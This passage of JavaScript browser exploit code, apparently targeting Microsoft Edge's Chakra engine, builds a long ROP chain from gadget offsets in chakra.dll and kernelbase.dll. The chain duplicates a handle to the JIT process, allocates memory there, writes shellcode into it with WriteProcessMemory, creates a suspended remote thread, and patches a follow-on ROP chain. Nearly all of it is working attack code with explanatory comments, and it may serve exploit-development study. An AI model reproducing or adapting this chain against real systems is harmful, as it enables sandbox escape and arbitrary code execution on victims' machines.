	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();

	// LPHANDLE lpTargetHandle (R9)
	// This needs to be a writable address where the full JIT handle will be stored
	// Using .data section of chakra.dll in a part where there is no data
	/*
	0:053> dqs chakra+0x72E000+0x20010
	00007ffc`052ae010  00000000`00000000
	00007ffc`052ae018  00000000`00000000
	*/
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hSourceProcessHandle (RCX)
	// Handle to the JIT process from the content process
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
	next();

	// Call KERNELBASE!DuplicateHandle
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
	next(); 
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
	next();

	// VirtuaAllocEx() ROP chain
	// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

	// DWORD flAllocationType (R9)
	// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
	/*
	0:031> ? 0x00002000 | 0x00001000 
	Evaluate expression: 12288 = 00000000`00003000
	*/
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// SIZE_T dwSize (R8)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();

	// LPVOID lpAddress (RDX)
	// Let VirtualAllocEx decide where the memory will be located
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();                                                                     				   // Recall RAX already has a writable pointer in it

	// Call KERNELBASE!VirtualAllocEx
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();

	// WriteProcessMemory() ROP chain
	// Stage 3 -> Write our shellcode into the JIT process

	// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

	/*
	0:015> dq kernelbase+0x216000+0x4000 L2
	00007fff`58cfa000  00000000`00000000 00000000`00000000
	*/
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
	next();

	// SIZE_T nSize (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();                                                                     // Recall RAX already has a writable pointer in it

	// LPVOID lpBaseAddress (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
	next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
	next();

	// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
	next();

	// Call KERNELBASE!WriteProcessMemory
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();

	// CreateRemoteThread() ROP chain
	// Stage 4 -> Create a thread within the JIT process, but create it suspended
	// This will allow the thread to _not_ execute until we are ready
	// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
	// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
	// We will update the thread later via another ROP chain to call SetThreadContext()

	// LPTHREAD_START_ROUTINE lpStartAddress (R9)
	// This can be any random data, since it will never be executed
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();

	// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
	next();

	// SIZE_T dwStackSize (R8)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
	next();

	// Call KERNELBASE!CreateRemoteThread
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
	next(); 
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
	next();

	// WriteProcessMemory() ROP chain (Number 2)
    // Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget and pop rdi gadget
    // Comments about this occur at the beginning of the VirtualProtect ROP chain we will inject into the JIT process

    // Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // SIZE_T nSize (R9)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();

    // HANDLE hProcess (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
    next();

    // LPVOID lpBaseAddress (RDX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
    next();                                                                       

    // LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
    next();

    // Call KERNELBASE!WriteProcessMemory
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();

    // WriteProcessMemory() ROP chain (Number 3)
	// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

	// SIZE_T nSize (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
	next();

	// LPVOID lpBaseAddress (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
	next();                                                                       

	// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
	next();

	// Call KERNELBASE!WriteProcessMemory
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
